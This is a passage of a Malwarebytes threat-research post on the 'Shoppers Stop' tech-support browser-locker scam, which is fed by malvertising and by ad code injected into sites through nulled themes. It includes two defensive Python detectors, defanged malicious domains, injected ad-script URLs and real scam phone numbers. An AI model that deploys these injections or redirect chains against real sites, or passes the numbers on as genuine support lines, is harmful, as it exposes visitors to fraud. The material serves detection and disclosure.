In this template, the crooks have not bothered with changing the IP address (supposedly of their victim), which still belongs to the original creator of that page, located somewhere in India. The toll-free number, dynamically populated both on the page and the URL, is what the scammers hope potential victims will dial.

Traffic

As mentioned earlier, the number one vector of traffic to these browser locker pages is advertising—more precisely, malvertising. Perpetrators can spend a small budget and attract a fair amount of visits through one of many ad networks. More and more, we are seeing ad platforms ensure that visitors are legitimate and not bots or others using anonymous proxies.

In some cases, this ‘lead funneling’ is doubled by the use of a traffic distribution system (TDS). Here’s an example we captured via the well-documented BlackTDS, redirecting users to ad networks and eventually to the browlock.

BlackTDS has been the source of many browser lockers that have been caught by other researchers as well. For example, on March 29, Vitali Kremez reported an infection chain to a browlock started via smarttraffics[.]ml.

Another instance of the same threat was found as part of an ongoing campaign of compromised websites injected with ad network code. There have been reports from site owners since late last year, but the trend has increased recently.

Denis Sinegubko from Sucuri noted that an ad script with the same ID was injected into over 2,000 websites and drew the conclusion that this was not a case of webmasters using ads for monetization, but rather unwanted ad injections into their CMS. Using the Source Code Search Engine PublicWWW, we found thousands of websites with the same ad codes:

For several weeks now, we have reproduced numerous infection chains to exploit kits, browlocks, and other scams via those injected ads.

//go.oclaserver[.]com/apu.php?zoneid=removed
//go.mobtrks[.]com/notice.php?p=removed&interstitial=1
//go.mobisla[.]com/notice.php?p=removed&interactive=1&pushup=1
//defpush[.]com/ntfc.php?p=removed

The server-side PHP code (WP-VCD malware) used to load those ads can be seen below. Thanks to our friends at Sucuri for sharing it.

Sucuri’s SiteCheck detects these server-side injections as rogueads.unwanted_ads. The leading cause of these injections is nulled themes, pirated copies of paid-for CMS themes. The free lunch often comes with backdoors, lack of future updates, and of course violating licensing and copyright laws.
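Site owners who suspect a nulled theme can check their own rendered pages for these injections without a third-party scanner. The following is an added example for this write-up (not Sucuri’s SiteCheck, not PublicWWW, and not code from the post): it extracts every script source from a page with Python’s standard HTML parser and matches it against the four injected ad URLs listed above, handling the protocol-relative "//host/path" form these injections use. The host, path and zone-parameter triples come from those URLs; the sample HTML and zone numbers are constructed.

```python
"""Scan a page's HTML for the forced ad-network script injections described above.

Added example for this write-up; not Sucuri's SiteCheck, not PublicWWW, and not
code from the post.  The host/path/parameter triples are taken from the four
injected script URLs listed in the post; the sample HTML is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# (host, path, zone/placement parameter) for each injected script URL.
INJECTED_AD_PATTERNS = (
    ("go.oclaserver.com", "/apu.php", "zoneid"),
    ("go.mobtrks.com", "/notice.php", "p"),
    ("go.mobisla.com", "/notice.php", "p"),
    ("defpush.com", "/ntfc.php", "p"),
)

# Constructed page: one first-party script and two injected ad scripts, one of
# them written with the protocol-relative "//host" form seen in the wild.
# "&amp;" is the correct HTML encoding of "&"; the parser decodes it for us.
SAMPLE_HTML = """<!doctype html>
<html><head><title>Constructed sample</title>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="//go.oclaserver.com/apu.php?zoneid=1234567"></script>
</head><body>
<p>Hello</p>
<script type="text/javascript" src="https://go.mobtrks.com/notice.php?p=7654321&amp;interstitial=1"></script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def extract_script_sources(html):
    """Return all <script src=...> values in document order."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    return collector.sources


def classify_script(src):
    """Return a finding for `src` if it matches a known injection pattern, else None."""
    # "//host/path" has no scheme; give it one so urlsplit sees the host.
    url = "https:" + src if src.startswith("//") else src
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    for pattern_host, pattern_path, param in INJECTED_AD_PATTERNS:
        if host == pattern_host and parts.path == pattern_path:
            query = parse_qs(parts.query)
            return {
                "src": src,
                "host": host,
                "zone": query.get(param, [None])[0],
                "protocol_relative": src.startswith("//"),
            }
    return None


def scan_html(html):
    """Return all injected-ad findings for one HTML document."""
    findings = []
    for src in extract_script_sources(html):
        finding = classify_script(src)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f'injected ad script: {f["host"]} zone={f["zone"]} '
              f'(protocol-relative: {f["protocol_relative"]})')
```

The zone or placement ID is worth keeping from each finding: as Sucuri noted, the same ID across thousands of unrelated sites is what distinguishes an injection campaign from webmasters monetizing their own pages, and it is the value to report to the ad network.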

In the following traffic capture (thanks Baber Pervez), we notice the ad injection leading to a malicious redirection chain via the following sequence:

  • dreams-al[.]com (Compromised site)
    • oclasrv[.]com (PropellerAds ad network)
      • deloton[.]com (PropellerAds ad network)
        • xml.adhunter[.]media (XML feed)
          • updating23001.accountant (Shoppers Stop Redirector)
            • techno59033.download (Browlock)

We have observed the same (or a similar) pattern from many sites that had been injected with the ad code snippet.

Redirector

The redirector page acts as a gateway to the browser locker. On the surface, it is an online shopping store called Shoppers Stop, offering merchandise for men and women. Shoppers Stop is also the name of a well-known Indian department store chain with over 83 outlets across the country. We believe the scammers may have been using that name to set up either a fake online store or a demo (many scammers are also into website design).

https://updating23001[.]accountant/men-shop

This domain is itself a clone of goshopper[.]info, which was registered via privacy protection on 2017-10-27 and is now parked:

However, in these malicious redirections, the online shopping site is purely used as a redirection mechanism, which is done in such a way that victims will not actually view any of the content. The redirection is done via a 301 redirect, also known as a permanent redirect, typically used for SEO purposes by website owners that have moved their property to another (permanent) location.

location: https://techno59033[.]download/TollFree1-877-670-2749
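Since the redirector and browlock domains rotate too fast for a blocklist to keep up, the durable indicators are structural: a permanent redirect off a throwaway TLD to a second throwaway TLD, with the scammer’s toll-free number carried in the URL path. The following is an added example for this write-up, not code from the post or from Malwarebytes: it reconstructs a redirect chain from out-of-order proxy records by walking Location headers and scores it on those structural signals. The hop domains follow the capture listed earlier; the HTTP status codes, paths and the number 1-800-555-0100 are constructed, since the post states only that the redirector answers with a 301.

```python
"""Reconstruct and assess a browlock redirect chain from proxy records.

Added example for this write-up, not code from the post.  The hop domains
follow the capture listed in the post (ad network -> XML feed -> Shoppers Stop
redirector -> browlock); the HTTP status codes, paths and the toll-free number
1-800-555-0100 are constructed.  Detection is pattern-based on purpose: the
post notes these domains rotate too quickly for blacklisting to work.
"""
import re
from urllib.parse import urlsplit

# TLDs the post associates with the rotating redirector/browlock domains.
SUSPICIOUS_TLDS = {"trade", "accountant", "ml", "download"}
REDIRECT_STATUSES = {301, 302, 303, 307, 308}
# The browlock URL carries the scammer's number in its path.
TOLLFREE_RE = re.compile(r"TollFree(?P<number>\d-\d{3}-\d{3}-\d{4})", re.IGNORECASE)

# Constructed proxy records for one client, deliberately out of order.  The
# compromised page (dreams-al.com) loads the ad script itself rather than being
# reached by a Location header, so the walk starts at the ad request.
SAMPLE_RECORDS = [
    {"url": "https://updating23001.accountant/men-shop", "status": 301,
     "location": "https://techno59033.download/TollFree1-800-555-0100"},
    {"url": "http://dreams-al.com/", "status": 200, "location": None},
    {"url": "https://techno59033.download/TollFree1-800-555-0100", "status": 200,
     "location": None},
    {"url": "https://oclasrv.com/ad?zoneid=0000000", "status": 302,
     "location": "https://deloton.com/ad?zoneid=0000000"},
    {"url": "https://deloton.com/ad?zoneid=0000000", "status": 302,
     "location": "https://xml.adhunter.media/click?id=constructed"},
    {"url": "https://xml.adhunter.media/click?id=constructed", "status": 302,
     "location": "https://updating23001.accountant/men-shop"},
]


def tld_of(host):
    """Last DNS label of `host`, lower-cased ("" if there is none)."""
    return host.rsplit(".", 1)[-1].lower() if host and "." in host else ""


def build_chain(records, start_url):
    """Walk Location headers from `start_url` and return the ordered hops.

    Records may arrive in any order; a URL index makes the walk linear and a
    `seen` set stops redirect loops.
    """
    by_url = {r["url"]: r for r in records}
    chain, seen, url = [], set(), start_url
    while url in by_url and url not in seen:
        seen.add(url)
        record = by_url[url]
        chain.append(record)
        if record["status"] not in REDIRECT_STATUSES or not record["location"]:
            break
        url = record["location"]
    return chain


def assess_chain(chain):
    """Score a chain for the Shoppers Stop redirector -> browlock pattern."""
    reasons, number = [], None
    for record in chain:
        parts = urlsplit(record["url"])
        host = parts.hostname or ""
        if tld_of(host) in SUSPICIOUS_TLDS:
            reasons.append(f"suspicious TLD .{tld_of(host)}: {host}")
        # A *permanent* redirect to another site is the redirector's signature.
        if record["status"] == 301 and record["location"]:
            target = urlsplit(record["location"]).hostname or ""
            if target and target != host:
                reasons.append(f"permanent redirect off-site: {host} -> {target}")
        match = TOLLFREE_RE.search(parts.path)
        if match:
            number = match.group("number")
            reasons.append(f"toll-free number in URL path: {number}")
    return {
        "hops": [r["url"] for r in chain],
        "final_host": urlsplit(chain[-1]["url"]).hostname if chain else None,
        "phone_number": number,
        "reasons": reasons,
        # A number in the path on a rotating-TLD domain is the browlock signature.
        "is_browlock": number is not None
        and any(r.startswith("suspicious TLD") for r in reasons),
    }


if __name__ == "__main__":
    verdict = assess_chain(build_chain(SAMPLE_RECORDS, "https://oclasrv.com/ad?zoneid=0000000"))
    print(" -> ".join(verdict["hops"]))
    for reason in verdict["reasons"]:
        print("  ", reason)
    print("browlock:", verdict["is_browlock"], "number:", verdict["phone_number"])
```

The extracted phone number is the pivot the rest of this article relies on: it survives domain rotation, and searching on it is what tied the Shoppers Stop pages to earlier templates and complaint reports.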

Performing a search on the address provided in the contact page gives us a lead about a .com domain called e-storekart[.]com created on November 7, 2017. While there may not seem to be anything special about it (it is yet another clone), its whois information provides us a bit more information than the other domains we had cataloged before.

e-storekart

This domain was one of the few Shoppers Stop templates that didn’t have a completely anonymized whois. Querying on the string bhushan, we identified multiple other domains ranging from support sites for printers, help with email, web design, fashion, and more. Many of those domains no longer exist or have already been parked.

But even inactive domains can provide some valuable information. For example, we retrieved an archived copy of antivirustechies[.]us that shows it used to be a “legitimate” tech support page for several different antivirus products.

However, the legitimacy of this company was quickly undermined after a few searches for its phone number. It is associated with many complaint reports indicating that people were cold called with the usual scare tactics (fake Microsoft support):

Additional evidence comes in the form of a browser-locker template with that exact phone number on a page hosted at palmreader[.]website/1-800-245-9970/. If you recall, the browser locker depicted at the beginning of this article is very much the same. The URL contains the phone number in its path, and the fake Safe Browsing template is similar as well.

The registration date for that domain goes back to late August 2017. A couple of other phone numbers are also used here, and hardcoded in the URI path, rather than being generated via an API on-the-fly.

To summarize, the same scammer group that used the Shoppers Stop template late last year has already registered a tech support domain (antivirustechies[.]us) and a phone number with the same type of browser locker as used in their Shoppers Stop campaign.

While it can be tricky to link threats based on material that could have been stolen from others, this information can also be helpful in discovering interesting connections to additional web properties associated with fraudulent activities.

The Shoppers Stop tech support scam is among the top campaigns we are tracking (trailing just behind the .TK and .CLUB campaigns). It’s getting a lot of traffic leads from a large number of sites that have been injected with ads, on top of its other malvertising chains.

Malwarebytes users are protected against this threat thanks to domain blocks on oclasrv[.]com and deloton[.]com. We have also reported the advertising IDs we were able to collect to PropellerAds, and the malicious redirector domains/browlocks to CloudFlare.

Indicators of compromise

A list of the domains used for the browser lockers can be found here.

The post Shoppers Stop tech scam draws from thousands of forced ad injections appeared first on Malwarebytes Labs.
